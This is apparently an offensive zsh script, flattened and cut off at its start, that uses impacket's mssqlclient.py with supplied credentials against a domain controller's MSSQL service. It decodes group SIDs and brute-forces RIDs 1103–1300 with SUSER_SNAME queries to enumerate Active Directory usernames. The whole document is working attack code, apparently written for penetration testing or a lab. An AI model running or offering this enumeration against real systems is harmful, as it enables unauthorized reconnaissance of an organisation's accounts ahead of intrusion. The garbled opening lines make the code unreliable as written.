#!/bin/zsh # VARS GROUPS=("${(@f)$( binary.sql binary=$(mssqlclient.py "DC01/${USER}:$PASSWORD@$SERVER" -file binary.sql | grep -a -o "b'[^']*'" | sed "s/^b'//;s/'$//") if [[ -n ${binary} ]]; then binary=$(pwsh.exe -c " \$BinarySID = '${binary}'; \$SIDBytes = [byte[]]::new(\$BinarySID.Length / 2); for (\$i = 0; \$i -lt \$BinarySID.Length; \$i += 2) { \$SIDBytes[\$i / 2] = [convert]::ToByte(\$BinarySID.Substring(\$i, 2), 16) } \$SID = New-Object System.Security.Principal.SecurityIdentifier(\$SIDBytes, 0); \$SID.Value ") print_success "$group = $binary" echo -e "${group}|$binary" >> ${SIDS_OUTPUT} fi rm binary.sql done } function usernameEnumerationBySID() { local SID_BASE=$1 local RID_START=${2:-1103} local RID_END=${3:-1300} local rid local SID_DOMAIN=$(echo "$SID_BASE" | tr -d '\r' | tr -d '[:space:]' | sed 's/-[0-9]\+$//') for (( rid=RID_START; rid<=RID_END; rid++ )); do user_by_sid_sql_query="SELECT SUSER_SNAME(SID_BINARY(N'${SID_DOMAIN}-${rid}'))" echo "$user_by_sid_sql_query" > query.sql result=$(mssqlclient.py "DC01/${USER}:$PASSWORD@$SERVER" -file query.sql 2>/dev/null | tr -d '\r' | grep -a '\\'"${DOMAIN}"'\\') rm -f query.sql if [[ -n $result ]]; then echo "$result" | sed -n "s/.*\(${DOMAIN}\\\\[^[:space:]]*\).*/\1/p" | while read -r user; do [[ -n $user ]] && print_success "${user}" done fi done } function enumerate_all_from_sids_output() { [[ -f $SIDS_OUTPUT ]] || return while IFS='|' read -r group sid_base; do [[ -z $group || -z $sid_base ]] && continue print_info "${group}:" usernameEnumerationBySID "$sid_base" 1103 1300 done < "$SIDS_OUTPUT" | sort -u } function main() { # bruteSID enumerate_all_from_sids_output } main